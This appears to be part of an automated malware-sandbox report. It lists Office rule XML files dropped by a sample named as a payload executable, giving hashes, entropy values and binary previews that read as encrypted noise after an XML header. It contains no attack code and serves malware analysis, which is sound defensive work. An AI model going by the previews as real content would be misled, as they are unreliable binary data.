                                                                                                                                                                      Preview:<?xmlk...f.v.Mp..%s...y.5.}..#...Iw]...Bi....9.*!W.h*p..:...`.l..)..~9z.m...pC...+B}1.....+.g.....Z....w$.d..M.^..).u=.s...y....T..v....-R.,...I..~....P...`..e......C....N.I5..&b.kV<..#...........8.1j.4e-..J|.!.......sy...?.=.....`T.97.D.v.rG.......3..Q.N.y.R....[...%.G^"..o...G..C.B..N.....(.. .j.u...'.!y..8w..:...._.C.).5.z..$(..$J....z.k..G....g.Z...]..\W.i?..%....P.$..].f..Fg2>.Ko...&h..^........I.d"<Y.....V.....SS...(.....|...^.,t\C.c..b....Z........)\M3.v_.|:.~.j..z.CX..x...V.....6.O......t.5.K......h0......c....Z[7.W....C.&.GX...,.F....[...!.#...I..........=.( T...A.j..q.0..5f...G..yz....2.).H9....49.3..$.R.z?..*..q.+.j}.\.C.@N..v-...=.y@,/4.E..]9...N.._T..#>..1.......6b..x......(........y....&!c.!... XV.|.0...V..{..d....X..i.t".m..H.#{p(....5j.c......iY.$w..){.r..+O}"%..&|9..[.I|.(.U...1...."...K).....Wf.....2..O.."..........(.P....c.&T..............\4$.........I..]..%..]d..].......;.$.L.K.S).hK.O...#...Q-B.f|..C=k~..J

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703700v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                      Entropy (8bit):7.862238679452825
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:uVaPF1R5yJ1FGpjHWtfdMrWjsjhkF5OmSfA2gD:usPnR0J1ESer4sjGOmSf8
                                                                                                                                                                      MD5:C4459361A73A276A46BDBFD2699FDE8B
                                                                                                                                                                      SHA1:75B334935B116F80044DAB1CB66AAAA601F3695E
                                                                                                                                                                      SHA-256:1351B8F8499C4BD31DD2446FFF9099DD44C670E887AC164467B801544957D950
                                                                                                                                                                      SHA-512:F23EC21EC3F4C0F4A79B79AFB220E886B1F563C840A0A67CDBB437BAAF43EC6104ACA617595973B8C02F0E4102F8749C79BF40D4AED07FB102832215D7E24EF9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..g.._B.}.r..~.....h...#/..W..k:*.....+.<......[..t.K...:.L.....\.B........;9.Z=J..:.qow}.:......11^.K+p....M.6........v......E.PE....x.Kk....y..-.nLP!T.kD.7.v.N..$..."c.....9.*C...Rc.."_?AO..!....../T.6.....o.<...%..PI..Io.t:.@.p..=....5....4_..J.H..PVy....F+Hx........3^_.D..j..y....+-......S..%.....!.fP+M.S..*I.3.i.u..P>.O.Y)......D.....,.R....k[,`..th......E..+ri...2.9.{o...W(........L..L.Q....xb.l..............9.&.3)t.^v.......\8......+./Mo@ewz.?.....r1n.hU1S. .Vn0.D.k..A..'i.e@,..g..MzY.e.).].20ymEOUUV%...._...D.5.X......%..............\.=...0Z.\...S..X....B.8.........b....$.-H..p.J..a\.......ni..f]..qI......C...e..1......m..k......[....@.C$..6..\.....-1VW..B.....:.U9E..g.y.......t...\&.P....%tTe......6+]1b.C..& ..gd.J9r.q...V...|rQRH.......8..g.k..Dc6.......r.p......HE.Mpa......(_._.S..^....CX......C.....+.I.sB^..w....e.E.P....P..[n......'.L+3..Y..33>..:=S^j...C+X;...#%.<.#..d^0jd.....}{.T...U.O.QWTc^9.......m@*.....+P?.!.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703701v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1748
                                                                                                                                                                      Entropy (8bit):7.885006347510941
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:w37qot3pbpYhox29ypPi1dhkR//43j9UD:w+oB1pYGxTp0dhkp/4T9A
                                                                                                                                                                      MD5:38E33CCE6D555443FCCF230BF8888A01
                                                                                                                                                                      SHA1:F6E25E225C03647AB9C3CE8646868F1675C803B4
                                                                                                                                                                      SHA-256:CF2C4D52AB1C3053E692471EDBA5C0687A26DE3521333FC8600B7B34C05A6834
                                                                                                                                                                      SHA-512:8D891B56DB3F2866D0A54709A0DAF2D72447BF38596559C0E8B98A8B2A010B6B51745D256ED1EE00169E0B81AC6B3A5E253DB1C992ED7A82AE3E3123B21F3801
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlM...(c.V.A..@s..{.&M.|.. ...-.US....r...#.k../..Q....C...':M.+.4...C....n4..]......2.@.:...$..-+...)s.ijwK#.p.@............Q?..]....A].n....v..?........*......8......59_..-...B...Bn9'@.7*fX.>{K...."[[..4v3.............,.._.Z.b........YB..y......l..B...$y.............Z.rX..8s9/....J#..~G....R.\..p+i...>.s.6kkH...si/W.Lp6..........b..J.j@......}..V..;..6.E.Q>..g`.e......:> A1.6....h.G_{...V9.Y}.f$..8......,/..9.m..QWt...........k....f.".U.t..lH/........mj. !.@Q..|...E\...0....cE.......V..d#.R.W...T.E\MA...........Yk...=n!|.2.A....:u......#.w.4.%...q.x.fg...:.....~u....qW.q.T...&..3.~....JN)>...v....8..j#..7...0...58..(vf......j......3c....Z.).....h.D;.........S.e..,.._..``.Om..+.=......6...;..e._.....:..~[Rp..|fp..:;.....>`.g..K.zdpa.....Y_......1....Z.|.....2..zU...>5...b.....]...!......Xn..q3.q..|.....0..i...F..}..8,.)..B.og...A......9....."..p....).vb....W*'!.I/1......(_.M.jDxs..>}mgK..+.......1.>b!./v}..{..&%.$

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703750v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.872752012362986
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:+ilhKREg6CZ1f7J/yG7x2ZHD7Q61jDr3TD:++KREg6e1fBx2ZHD7n//
                                                                                                                                                                      MD5:84A403F9DBE3D5F760BB6A00B58B9B37
                                                                                                                                                                      SHA1:30EFDFDB4666EAE92BF16CADE33E26BBC4E17B4C
                                                                                                                                                                      SHA-256:02966CBCE3192F6264BF40B3204CD684D3EAC46C69E2062403D0337A701F3DB7
                                                                                                                                                                      SHA-512:D058A69FEF5475BCDD604248694216F75FD35CAC9CE66EA2E001F91FC6A4EF6FE7B1793EEA3A5CC4AEB8EB36A8B4FD9E53E4700D24544A5412696EEDC43602BE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml\..e6b6...+x_ ......Zg..r.2.wp.]...'.z-...;<aA.n.I(.O..1...'..w8...M.HDzV .{....'r..^...L..*..hn@|.txV..;.....@......\O...'........?.)............5..s]...b....O.}...K.2..@[...c..<...M....4.v.q....@r...._.r......0./J.,a.>EI...5{.sa....G.;..Pf....Ww..(.).....s...A./..[.u|.\..V;-.YR..c.Sk...U*.. Y.>.h%...=.<.q...K`b.{n.a.......|.u.........VM.4l..}7.2...o..2Y.{.......u.b...m.L9D..:M.../s.....0.".L...M.0..U.......H.'.p..^s.\ .D.....nc....y../(..ywb...;.[.:..k.2<-+.i.Q._Dp.....KG3..w.[....C..[w..,...0...|.<..AO.Bx.....e..o..P.1~.;_l.r.F..T.G.)..+..w.....Lb*Z...A..vq.o..0.s.;..0..p...]...0.=..pZR...E-.Ca..g.8..q..15..c...z>.^..m..j)..t...|k(..[/1.}..$q.yQ.3..\....l..x.i)........)|.n.FAD.Z..2........q@[E".. .\yX'..+......V..n/..Q.....VG..I.L!...<.k.'.f]m..[Y@...Y...8..h........x.uI2.G..k.n....A2.g...h.|....[..L..5=..@.f$...B.(.....D.)..Cnl..x..H^.}.I......O....s...M....j$.....[ ..z.4...hc...C=.M.............V$G[..{...=,[#..0H......._....w.Tg.Y..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703751v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1770
                                                                                                                                                                      Entropy (8bit):7.895722643801438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:l4RNlbPthcnT7wZNQS1ALJsQs324rhPjD:aP91hWPwZGS1xHh
                                                                                                                                                                      MD5:C917450C7ED9F01C32073108C330A34D
                                                                                                                                                                      SHA1:8AD1B37B71BDF3B541177BAB9AB61DBD9139F13C
                                                                                                                                                                      SHA-256:C6870FFF1412F6277D846FE7E39E63B1ACBC143802E8DCF3636EEE91A277B5D5
                                                                                                                                                                      SHA-512:A8EFEDB87F91C26475AB0446A105B4E473DF9D1C70205A52133E3D7EAA67805EC74DEFA90EACB399A1C236BCBE76632FF0A81CAB08DC2C815B2BBD490287DFBE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlQ/......[>.>.}R.....3g..Fz..Z...`...$.......z..,~..d.7.=....|...TuQ.....]...d#.....rR.W5./.q...HOn..w.;...P......,.t.g!..JA.C..r8.T".-.../..8z0..`..'./d..c..."........t;..F.....I.(.N.=..]*...1.+.{zM|...]c.`%.q.w..-..J...i.....#.....l.t5q..7:....I.....Rt.{..;...5X.,~.....&.x.b....={..... J.H.m....7m......2.....<.u..kG.3..y .^h...+ ...+.!.6LgO.....D..n~..J.~.a]..B..~Z90.."%......Z....i'.X.&eO.J...(.8.i..na{...B..H..|.N./wG.^.Z..p3.?r...[...^..xR.Lq..y... b...q...}..@.q...DH;...z.n.x.~......Q....K...>....+.....#..Q.j.ea.....&C8.....k3.......H.N....*.....u..Ee..i.p?O..).JX.....b.Th...#.Q.YL1.......<7.6...S..P}.......E...rK.l.`}.Nn....F.c....z.U\...%Y.[..28&O.....IPz..2/.b.wS/.[..+w(0l.b.h..U.2)...*."..<.fXao]..l.....8H..{6._.$... .Y.i.u..H..so....m.uY.F\dq..$...,/[.'.J....KXc.#.I#G.......=....H..u.. J..I.l..+..6.=.X........so.*...b..5...b..r....o...'..s4......+.(..z.g{.E..?gM.......[.U..'.D}...0.6..s7.D..w..H6'.....v.%...~|w.pn.mi{.SE.....)."

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703800v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1715
                                                                                                                                                                      Entropy (8bit):7.874772262499358
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:+vvKc3rYLtABufe3YGO3DCYD+o6iCWRCZD:+6c3rGAufe363DD6WDCR
                                                                                                                                                                      MD5:30F1B39807EF0CA603B3A2B4EE03D70B
                                                                                                                                                                      SHA1:1E572DAF564349F2845BE95F8D02CB0365882090
                                                                                                                                                                      SHA-256:7EFB4349B6AFBAB20FC3B86B90EDEBA7FD67CF163FEC525EE40A6C71246B39D5
                                                                                                                                                                      SHA-512:6BD559DBEB9E52E94BE723F2B29754DC3217898ACE5DAEB4E227740B7551B6C7711593290351A850E1EC85E382FC85E2DA7316780F39EC9AD7C12AEB384FA936
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml._6.D.Q0V_...q7.9..,1.B.<[.n..P.|...h.j.TU.#3...,O..@....^V..d)).a.|.-W.+...L.pj...'.%..Vq[.w.z..aa....px.+...).....6.!xK.H..CKT.\W".y8._.5S.kO....-{ Z^gHp6..4..^>C+....!.*...yV.|.&.......D.x.=.[J..`F.e..M..k...$.<V.)[....p..-..g....9.>...(....=.dg.(,f.P.......i...'.........VKr.?.-...*=ie.>.?B..."G.r...M...ST...6&.c.vF.lr.>.R............S.E.d?wq..\.g..h.$.E$OOX?....J..N\.......Q...#e.`.G.......=1^o\..g-.];.b....J......d'......3..z...e.. ^Y.y.&..o.ci......S..=.(s&.8...H..@T.g.xU...X...y5....>cRx.rJ...A1.$.Q.#....FF...:.......U..&...d..).e..g..!.7r......q.o..G...[.Eq|H.K..o...Nt.F..mk..O.~.=&.....M.:......y.dP....H.A.-.t.U .....!.h^<4<.J.....B.u.}.ya.{...#....Y=.P....W.....[c+p.Ihn.g>3xj&q...f.D....Q....<.K.D...;x-.u.f..I.^hT.Ss...,.a..3?...s].Q.$.....yY.._.m{r`!..s...>......~...kt.~.HF.FT.p.p..U........c"5...pi.!..o...+. .H...._A..g......(. .......q.*.........`'=...{...F..)9.....b!.a.5.A..]......i..x5.].Y;"."e.c.f...R...E.C.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703801v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1752
                                                                                                                                                                      Entropy (8bit):7.893158602989037
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ljxVk6dkutYgt9Uimk5cc2d4eABiAveOLagsIyfALD:dxS6dBtFUip248AhmgsI9
                                                                                                                                                                      MD5:3147793DB85AB6124F8D5D838800F0CA
                                                                                                                                                                      SHA1:6619C1A7879AA98249BBB58F8263A1A370F8FFA4
                                                                                                                                                                      SHA-256:93DAE852439B06F9F9CE71184C71FAEF69C420EDA8E7FFF67A5E81B11B0819A3
                                                                                                                                                                      SHA-512:9E61864C1E8B033319FF0D4A12D3D5E1B88BFEFC1FE86BFA63112E39E4ED75F388E0D901AA522378DB5F0B00C0459FD2D7DB54DE322CCAE52CA19E2AD90DF419
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml."..ej..K-...L.n...K..d....B...C.ML..O.3...1..7J..z2]E.?.N.7y.%Z...YL9.iJ...e......b.R2+..P.,..{C.$F.Ee..d.e}......^.h.H.6V.. ...E;...f..9`.0.2..Yc....X..g.'.........v.D.N.|.;..Yw......hTJ0.i,... .s-N.......G5S.6.v|*...>qz...P..VZ...U6._...%E".Z.^..8H.........n;..l.-.......DR.s...MR6L.....4.!HR......I.|`.8...:4...Y...X.....P...W.....N. .PX..(>.@..\.&...bH...~CW.b6{.R.Z..cZ_E{...L....&:X...Cv.K.P'p ". .Z..c.....^d8.....-.C.G."5^Y"..g.U....ta....O...72......Z..oa..2*.k....xp..10._....if..t..>h*;......"2x.....g-...g..........fr[..Q....w..e..T....m..].Kl.`..\...MN.....q...'.(.3...O.....E....I.-.*.*)..hs.D0..;.k L.OZ-Q...fC..%.....Qi..h7.=.[.<.,...Qg..s..,.A|\.x.3.y(^mL.[;...^..ZE.w......7.....K/......Q.U.W....q9c.E...sn...ky.5.2$t.".I|A."..y...@...v9.k..|.....%}....B.0P..8BB_.'k....?..Ba.....VO..U.Wpo.....T{.UI..(....K.8.....Ae...=..SS{q.q!.Or...@._......\....VT...>..T..;J.U.R5bS..Z3!-YiGP.j..F.cp.H.0|..;.O.......{zd}..Q...:!....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703850v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.882777622493784
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:w4ZJoxLtlwezz7SYIKQ9dJRf4I3VXxSqZmkj1W/F6D:w43obzz7SYEp4I3VzZtjWFS
                                                                                                                                                                      MD5:E69C399BEED9105FA5EA7855E4D99116
                                                                                                                                                                      SHA1:4DA2631D1C6D5C79917A86EDB14FD23DEECA6D84
                                                                                                                                                                      SHA-256:28A0A05342AF8188F50E6178020330335C06335EF6F0FA4E4F794769B8789B65
                                                                                                                                                                      SHA-512:5B2B13156C9E8E29C87B2857BE024E9957061096810467037FA7B80B7864150D081ED16CD5026ADC0445C2531041942763649D8AFAAED60D118855ED8054D416
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.}.!..3..\.V.s1._.....t.\...].:..6.|=.yN.F.OL.x......=...B..h.".....\.u.Dl...G..-.f.....Zq..`n..p.vp^W.CaS.Q.].../..3.>.t...B<./.]......kw....v.e...Z@ .s.%.9.bxL....d...ElhW4........=.w...l.5...T...q....g........*L....^j..H.-%..@y.X...\4.-.&8......z.R@....Y?.(.(.V....Q4...1M^.UU...[F..a.R ..V.0 .....Z..~..K...].....2a...}R.......vYp[.......S.S.......1zY.2...f...^..*,.......(..F..j....E..~.JGE1..$.%.....RX.).I..>.~..7.A..yh}.1..he.J.Y`B.Q...gFKb.7.g.W.E...$..'.J.~....q......!....0.|..p._....`.s..0<...).W.'..D..11+.C~...,..K.&.A.........3..5..`.....A....@|.....p.[MC0BR....N9....<A.X...A..t5.....M.E..R....Q-..y9.D..}.u.J.o...(....<..?%Z..D...hg..RR......s..v.Q.T.%?.....I..jN....~.a..t..7..W......H..[.7.M#..;R...-.`a....v..~/.G..:=jX.o.....K.,.....=+] WI.(..u.y.....,.._Z^.4_..Yg...H"F.l'...Fah.......!|..v......e%(:.eX....d.r...._.........c...1..y.sDUl.....u....[......m...L..;W...$...%(.q2S.H=....Z..[..0.eu..+....{

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703851v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1775
                                                                                                                                                                      Entropy (8bit):7.888565595611236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:k260DiExTKo/Wg/saWv/dgsl2iIOaHK0D:PoE1Ko/tWXWiIOaqg
                                                                                                                                                                      MD5:A19BECBF23DEBC1EAF92138BEB4ACDF3
                                                                                                                                                                      SHA1:89CDDA947282862A879E0B6B946B3DE4A2161DD6
                                                                                                                                                                      SHA-256:3E148AF99DBEA5962849093BBCDA43E66918158E30527F7480DC840ACBA655BB
                                                                                                                                                                      SHA-512:B0BAD3BE84BA764B9AAEBEC205E3E61756340623BD9EAF41D9F7090F5A073694C566A48B363FFEEADDC4D04A834CEE34D8AFFA5B0721F8124C78F1E1D0FA944B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.\..\.l..}{...`v.8..QA..'.....MK...nB.X.R%Y.c.&.|...G...e..42p..;.....^.g.c&.8.J...u.cZ..b.v.#_e..'\..7.....E.....;...'mmZ.....P..8...7fb...J.....UEp...?I..rl..-MMq...e....3.o.G..t..}0.<.g.j..B...qk{..V...XR.T>a.2..0..u...Z...?,.-f..c..\.^,.ISfG.O..I.D.':..........c."......./..z.J.L.....Y.#g....N?...E....k...._.W.a..o3^8<rp...G..S2=bA....6F.Q.)x..q.>..l...N.yw..e..#..jDO.V..M..../..+.T#!.&...P.o&....8.V.f....i.Jc.3V6.e....-)....... z...`..~.Uy...0.{......Q......b.5.B.c.o...J........L...... .0......:.._...mv...(./s.]....d.?..+.D...~........[.+....~.>O.1.2s.........>dN_i..^`h:f.........|K?.P....Q.)g..rp...WR...Jb.....i.=.E...t.\;...b.1.......m6-..=.N. .K.Cb....6xx.`'z..-...).....u.U.....v...Y e..{..WK..E.....+k.(.8M*...'...5.wcYx.%B..btO.<R...s..!..O.[S.'b...L..w....~:...G....e..\+vu.B.....cf..5.[..:I.....p....9C.Y...E..qI._.`_e.B........3C....o.6i....~.y.UF/.5.2.-...m.$C..iP.."y.G.....s7O.30. ....r..1...W.....~.*.y.i....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703900v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1723
                                                                                                                                                                      Entropy (8bit):7.886118114874145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ktRt8ccfR19HcF96Yj9GuiDVE0F46qc66zLVZ6FleMNXFv15EYLG+uaMJ3210RXf:kjBOR19iVI00a7c6gLmFlnF3W+sG4SuD
                                                                                                                                                                      MD5:97C5D3B7155E774B33E3D38C793F8464
                                                                                                                                                                      SHA1:E52E45923384297BD2C7EA559BFE821F2852781A
                                                                                                                                                                      SHA-256:525FB9ACF474E0551AB72131886556E93159A34407438F910C7B1122852CD807
                                                                                                                                                                      SHA-512:0F9041E00E5A70020ABDE7AFF15CEFE6F4B91D5CB56C8D51180171CD78171802C01DA4DC1F3CAB7DE320011625BCED9D0BE4CC43D30BD7C0EB610FB707AFB12F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.$......g...|.?..M.....&....I.........iG~f..#.;..o.vW.e,.2HC}k..`.+p.....`b.jM..O....kU..3t0.*g@.s.0..w.r.......`.u.4...&..L%.K.n^.**...*0!.e..5...(..g9F..n.!.....w.!...8AJ.....1^D......._..J....1F..k..Qo..e.X..]C."..7........|TT.0O.pN5...{-....p.7.....0.QF.s...+.N_...b..{o^.......4.Fe....,...+.....c^PV.-h...F.{.aw..P./...w%e...0M...n..`..v.....W....._`...g.).*..9.!.........L.i..=..1...;..0m.0.V...Z.lD..j`.......TA..n..VV.v..~.Oyi...7.G6..F0..e.~..E.a..!%..W.5.Vv...h.i.p.0.O,.?...$........h.B.%. ..U^T12d0.p......7.... [n.F.1yt.....]>.[W.'.Fb.....5.~.E...k.U..^.\...H.T#.T.k..7..W.D.Dav../4J.......)P....2x.oe;.\E.G.../..c..6.....?.w*'@..k.d..<f*2yS...Gid..P.{K...M.9..n..f...L...7._..<%..-US....t./..R..Gd2.w0.u...n....B.y.C.+.;.s.h......!.Ep.$\...[R...=)_...U&.*.Z. ..9.N....l...WW..+dtVc.M..2..$c..[C...2....N<.QS...........aa..];..!...=.]..U..m.}..l.......2.......0.=."..P......$...<A_.f....&..6....XOW..Z..I.l.1X,.Wb...._....A`K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703901v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1760
                                                                                                                                                                      Entropy (8bit):7.8791056780815785
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:LSpVMempq8gNpfcV5/cr6poLfFy1fQbObPeyR8oCV4gzl2FzgMeSD9wS2bD:WpVMjep0HP8FQQbOCywHlWgfD
                                                                                                                                                                      MD5:CCAF21FC91DAF9FDB40D3DD16ADB0403
                                                                                                                                                                      SHA1:3CA4C8FC951ED0334075D5936358B28F8AC2FDC7
                                                                                                                                                                      SHA-256:C7B2DFABC81390FFE4DC57F3D01ADBC25098478B7358FE6E4559CE926E877316
                                                                                                                                                                      SHA-512:CBDEE2D78164ECCE9A127FE14BC5629F15E180380103BEF36D7C9466B67BD639C4BDA66AC426077C6A5413DE0E143C9033A9862432F8B40ECEC6CC3F78CEBC01
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.RB....{........aCQYc....I.G..e.teK<.m...6...x.6.S.7*....J...4.+W .o....._....@..hW.....Bu.E.L.P.rZb..:..ge..:.5s.aK...e.>_..D3.m.....9e..J0.....\.(.xe.K.36n.........~.D..F.r.<W.I\....]....8"..d.....'.Ivi.'..V.....].j.(P+.h $...ie...-....t..r.4..~...M....._...\..'(..m^...U].h.....HM...?.,...`9....H....KS.9...d.N..}F.{......m.8.=....8.....P.....k...VZ/...v...lk.s.%.eo.A..].q..+=.n..Zg...x..#D.c.&.d.Y..'...y...e.D}.J.n.<..H^5.j.....S*.k.v#.[..B...\...*8bQS......[B.....t...!X....W....G?.Is<./...Q..&%....qx...0*....92....c.......{q..%......W.rD...N&)U....n.........*..(.......').q..J.....~.@~.myN...%).....\..>..x...\...;...j....H...I.O.....w....e..k..{.}l9..L[..%..s.:QS.=..z%..0..b.2Y...3k..bXH#...U.....^M..B......|?.l.o'2..Z.......Eyz..{.>.v-.m.j.....|..&R....:q.....4X$...^.b#.^..R.^.........%'.....U..Q.`..N}.w..s.HK.vI.....H.....v.4.....jk.n#q.b.:..h..v.Sy.3a.....u.B...60.A(...}S..*...>5.H.k...lk`.tI.........;.p....Zd.$..MYB.e{.<z.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703950v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                      Entropy (8bit):7.875020507521975
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:lWJHeAsfbEGD8QbTRqJOjwwIdwqVuIAMfnrD:lWFetfbEGDBFqQrI6qB5fH
                                                                                                                                                                      MD5:2FBC1F0D4852EE8CDFD1435E93BB533E
                                                                                                                                                                      SHA1:09B981DDFC47C0999A6AF6D680820ACC2ED9A3FD
                                                                                                                                                                      SHA-256:9D4495C647681FE92BC1A78786A66CD07B2422204B7E426D92D9D46E15B84699
                                                                                                                                                                      SHA-512:26F334FF195F2D511F0646BA684BDD72F995DE949CD6A6E11A91B5A8BDFAEB66E4F083A45FD15B76885E63414BC45344A9F681F8853C398DCB67B05A98554D22
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml*..zwK.SE..."..p.....]...e.J-.0....t....g.:....2c.W.)s..@..:.y.g'...'..}x..L..Ba.~./.8a.P..Ndd~...s..+..E.[..Q<."n.....".[H..44B.I9.T.\...+r..h.ZY.....9.Q.........,..=..<......S.$X.B.+n..hYT...a1..@....$y5??.y.....UX).yqX..T8.Q.G....6.a;..S......4.n......J....Q..2.lA.<)m....b............t..D....w.0...\Cj?).D...G.Xp...o.B..$..d.. ....]...;.U....!b....>AIv"mNdd..r/....}Z$.wYG.l.5.5..>.Ab..V...H.t@/{*..pt...z.....%...O.Z.1..R.v$[s....PGH..,)..e.%.^.Wy....:.b....kw.".%<.. ....`.h...Qk...].....-.`...9.H.'.ba.Q.&D.(x[\5....hm..rdc?.ms.....^..yi.s0@.y.xP..R...^...~.|A..B..5.{32).1s.........=,fF.uZ.....\.+..U.xze.$..E...9{........1...L.....q.fZAS]u=.CRD...t.u.737DY....q...F...Z(?..I7.L.(.6w.9.....![.(....mB.t..(".v.s.....4H.....DMAw.:.?.....(k.?.T.Q...}.g...R.lJ..LAY..[.V.,};..^fg...e.. ~....55b........e8.b.p....l..n....(.q..*..*..x..5F...G.X..P..U.....X,3Sg.5RT.#.g.MW.'I.{ks].H.X*.w....I3.j."..H%[.kq.LG.tr;Dn~h..b......N%..*..B....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703951v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1736
                                                                                                                                                                      Entropy (8bit):7.891641494138699
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3mt/7CkKg/cEuY3bkLoq0xPRXlkJmBFBhsJD:3WDKg/cEu1gxp1oqih
                                                                                                                                                                      MD5:4452AEA4B986B557569F1BCDC47780E9
                                                                                                                                                                      SHA1:1A128F485315C469F084170841D73E6403BC9224
                                                                                                                                                                      SHA-256:FE4818EBCBE709DFBB8ADB91F88EF4ABD0CFEB0B8EC3FF1679894F80449A611C
                                                                                                                                                                      SHA-512:1B3083DD95BCB10F28A7D2D271CA005C8DB8C3FE19B6FA3F5B464092F10B369E258C82801FBCDD52D49D13185126DF7321D4F8E822ADD05C10B5BBA1FD7B6B12
                                                                                                                                                                      Malicious:false
